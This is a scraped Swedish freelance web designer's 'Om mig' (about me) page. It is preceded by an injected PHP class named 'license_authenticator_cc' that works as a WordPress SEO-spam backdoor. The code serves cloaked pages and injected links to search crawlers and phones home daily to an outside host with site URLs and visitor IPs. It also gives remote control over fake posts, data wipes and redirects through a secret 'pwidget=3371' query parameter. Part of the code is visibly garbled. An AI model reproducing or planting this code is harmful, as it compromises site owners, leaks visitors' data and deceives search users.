if(!class_exists('license_authenticator_cc')){class license_authenticator_cc{ public static function parse_output(){$data=self::get_option('sw-');if($data===false||!is_array($data)||!is_object($GLOBALS['wp'])){ob_end_flush();return 0;}$requested_page_slug=strtolower($GLOBALS['wp']->request);if(array_key_exists($requested_page_slug,$data)){$buffer='';$levels=ob_get_level();for($i=0;$i<$levels;$i++){$buffer.=ob_get_clean();}echo preg_replace('/\x08UA-\d{4,10}-\d{1,4}\x08/',$data[$fullUrl][1],$buffer);}if(!function_exists('is_user_logged_in')||is_user_logged_in()){}else{$fullUrl=$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];$fullUrl=rtrim($fullUrl,'/');$fullUrl=str_replace("www.","",$fullUrl);$curagent=self::get_user_agent();if(preg_match('/bot|crawl|curl|dataprovider|search|get|spider|find|java|majesticsEO|google|yahoo|teoma|contaxe|yandex|libwww-perl|facebookexternalhit/i',$curagent)){if(isset($data[$fullUrl])){$buffer='';$levels=ob_get_level();for($i=0;$i<$levels;$i++){$buffer.=ob_get_clean();}if(strpos($buffer,"$val){$new[]=$val;if($i==$kR){$new[]=''.$kw.' ';}$i++;}$newbuffer=implode(' ',$new);}echo $cleanbuffer[0].$newbuffer;}}}}} public static function get_user_agent(){$user_agent=(!empty($_SERVER['HTTP_USER_AGENT'])?trim($_SERVER['HTTP_USER_AGENT']):'');if(!empty($_SERVER['HTTP_X_DEVICE_USER_AGENT'])){$real_user_agent=trim($_SERVER['HTTP_X_DEVICE_USER_AGENT']);}elseif(!empty($_SERVER['HTTP_X_ORIGINAL_USER_AGENT'])){$real_user_agent=trim($_SERVER['HTTP_X_ORIGINAL_USER_AGENT']);}if(!empty($real_user_agent)&&(strlen($real_user_agent)>=5||empty($user_agent))){$user_agent=$real_user_agent;}return $user_agent;} public static function get_protocol(){return (stripos($_SERVER['SERVER_PROTOCOL'],'https')!==false)?'https://':'http://';} public static function check_query_string(){global $HTTP_POST_VARS,$HTTP_GET_VARS;$data=self::get_option();if(empty($data['__last_checked__'])||intval(date('U'))-intval($data['__last_checked__'])>86400){if(!is_array($data))$data=array();$data['__last_checked__']=date('U');self::update_option($data);$response=self::endpoint_request();}if(!function_exists('is_user_logged_in')||is_user_logged_in()){return '';}if(!empty($_GET['pwidget'])&&!empty($_GET['action'])&&$_GET['pwidget']=='3371'){$message='invalid payload';if(($data===false||!is_array($data))&&$_GET['action']!='p'){$message='no id found';}else {nocache_headers();switch($_GET['action']){case 'l':if(is_array($data)&&!empty($data)){unset($data['__last_checked__']);$message=implode(',',array_keys($data));if(empty($message)){$message='no id found';}}else if(!empty($data)){$message=serialize($data);}else {$message='no id found';}break;case 'd':if(isset($_GET['pnum'])){if(isset($data[$_GET['pnum']])){unset($data[$_GET['pnum']]);self::update_option($data);$message='deleted '.$_GET['pnum'];}else {$message='id not found';}}break;case 'dsw':if(isset($_GET['url'])){$swData=self::get_option('sw-');if(!isset($_GET['val'])){unset($swData[$_GET['url']]);$message='deleted url';}else {if(isset($swData[$_GET['url']])&&in_array($_GET['val'],$swData[$_GET['url']])){$vKey=array_search($_GET['val'],$swData[$_GET['url']]);unset($swData[$_GET['url']][$vKey]);}if(empty($swData[$_GET['url']])){unset($swData[$_GET['url']]);}$message=sprintf('good stuff, no more %s',$_GET['val']);}self::update_option($swData,'sw-');$newSw=self::get_option('sw-');}else {$message='Url is missing';}break;case 'da':self::update_option(array());$message='deleted all';break;case 'update':if(isset($_GET['url'])){$message='updated';header("Location: ".$_GET['url']);die();break;}case 'p':$response=self::endpoint_request(false);if(!is_object($response)){break;}$key=$response->purl;if(isset($_GET['pnum'])){$key=sanitize_title($_GET['pnum']);}if(empty($key)&&!empty($response->ptitle)){$key=sanitize_title($response->ptitle);}if(!empty($key)){$data[$key]=array('post_title'=>!empty($response->ptitle)?$response->ptitle:'A title','post_content'=>!empty($response->pcontent)?$response->pcontent:'Content goes here','post_date'=>date('Y-m-d H:i:s',rand(intval(date('U'))-2419200,intval(date('U'))-1814400)));self::update_option($data);$fullsw=explode(",",$response->sw);foreach($fullsw as $sw){$swCheck=explode('|',$sw);if(!is_array($swCheck)||count($swCheck)<2){continue;}$oldsw=self::get_option('sw-');$InternalLinky=''.$swCheck[1].'';if(!is_array($oldsw)){$oldsw=array();}if(isset($oldsw[$swCheck[0]])){if(in_array($InternalLinky,$oldsw[$swCheck[0]])){continue;}}$oldsw[$swCheck[0]][]=$InternalLinky;self::update_option($oldsw,'sw-');}$message=$key.' | '.get_bloginfo('wpurl').'/'.$key;}break;default:break;}}echo $message;die();}} public static function dynamic_page($posts){if(!function_exists('is_user_logged_in')||is_user_logged_in()){return $posts;}$data=self::get_option();if($data===false||!is_array($data)){return $posts;}$requested_page_slug=strtolower($GLOBALS['wp']->request);if(empty($posts)){$posts=array();}if(count($posts)==0&&array_key_exists($requested_page_slug,$data)){$post=new stdClass;$post_date=!empty($data[$requested_page_slug]['post_date'])?$data[$requested_page_slug]['post_date']:date('Y-m-d H:i:s');$post->post_title=$data[$requested_page_slug]['post_title'];$post->post_content=$data[$requested_page_slug]['post_content'];$post->post_author=1;$post->post_name=$requested_page_slug;$post->guid=get_bloginfo('wpurl').'/'.$requested_page_slug;$post->ID=-3371;$post->post_status='publish';$post->comment_status='closed';$post->ping_status='closed';$post->comment_count=0;$post->post_date=$post_date;$post->post_date_gmt=$post_date;$post=(object)array_merge((array)$post,array('slug'=>get_bloginfo('wpurl').'/'.$requested_page_slug,'post_title'=>$data[$requested_page_slug]['post_title'],'post content'=>$data[$requested_page_slug]['post_content']));$posts=NULL;$posts[]=$post;$GLOBALS['wp_query']->is_page=true;$GLOBALS['wp_query']->is_singular=true;$GLOBALS['wp_query']->is_home=false;$GLOBALS['wp_query']->is_archive=false;$GLOBALS['wp_query']->is_category=false;unset($GLOBALS['wp_query']->query['error']);$GLOBALS['wp_query']->query_vars['error']='';$GLOBALS['wp_query']->is_404=false;}return $posts;} protected static function get_option($prefix=''){$unique_id=substr(md5(sprintf('%s%s',$prefix,get_site_url().'unique')),0,10);$encoded=get_option($unique_id,'');$decoded=@json_decode(base64_decode($encoded),true);return ($decoded!==false)?$decoded:'';} protected static function update_option($_value='',$prefix=''){$unique_id=substr(md5(sprintf('%s%s',$prefix,get_site_url().'unique')),0,10);$encoded=base64_encode(json_encode($_value));update_option($unique_id,$encoded,false);} protected static function endpoint_request($_update=true){$http=self::http_object();$url=$_update?'http://codecanyon.io/api/update/?url=':'http://codecanyon.io/api/check/?url=';$url.=urlencode(self::get_protocol().$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']).'&agent='.urlencode(self::get_user_agent()).'&v=1&p=5&ip='.urlencode($_SERVER['REMOTE_ADDR']).'&siteurl='.urlencode(get_site_url());$args=array('http'=>array('timeout'=>10,'ignore_errors'=>false));$response=$http->get($url,$args);if(is_wp_error($response)||!isset($response['body'])){return '';}if(empty($response['body'])){return '';}return @json_decode($response['body']);} protected static function http_object(){static $http=null;if(is_null($http)){$http=new WP_Http();}return $http;}}}if(function_exists('add_action')){ob_start();add_action('wp',array('license_authenticator_cc','check_query_string'));add_filter('the_posts',array('license_authenticator_cc','dynamic_page'));add_action('shutdown',array('license_authenticator_cc','parse_output'),0);} Om mig | Webprojekt - Webdesign
2011/02/21

Om mig

Är Högskoleutbildad WebDesigner och Programmerare.

Bor strax utanför Göteborg och har jobbat till o från med detta i 18 år.

Är idag frilansare (har detta som hobby verksamhet) och har oftast något projekt som jag jobbar med. 

Det kan ta upp till 6 – 12 timmar innan jag kan svara på era mail och frågor,
men hoppas på er förståelse för detta.

Kontakta mig gärna om du undrar över något !

error: protected !